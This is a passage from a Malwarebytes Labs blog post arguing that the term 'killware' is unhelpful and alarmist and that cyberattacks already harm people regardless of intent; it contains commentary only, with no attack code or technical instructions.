Finally, labeling attacks as “killware” does a disservice to both cybersecurity vendors and the public because, if “killware” is a term that requires understanding an attacker’s intent, then “killware” must be applied after an attack has already happened. Good cybersecurity tools don’t just clean up an attack after it’s happened, they actually prevent attacks from happening in the first place. How then, possibly, could a cybersecurity provider prevent an attack that, by its definitional nature, cannot be determined until it’s already happened?

Remember the human

“Killware,” as a term, helps no one and it only increases panic. It conjures up images of hackers gone amok and dark-web-trained serial killers who work with nothing but a laptop—images that might actually be a better fit for over-dramatized procedural cop dramas on TV.

Importantly, “killware” fails to recognize that, already, attacks on computers, machines, devices, and networks have a dramatic impact on the people who use them. Ransomware attacks already cause tremendous emotional and mental harm to the people tasked with cleaning them up. Online scams already ruin people’s lives by emptying their bank accounts.

We do not need a new term that focuses even more on the attacker in cyberthreats. What we need is to remember that cyberattacks, already, are attacks against people, no matter their intent.

The post “Killware”: Is it just as bad as it sounds? appeared first on Malwarebytes Labs.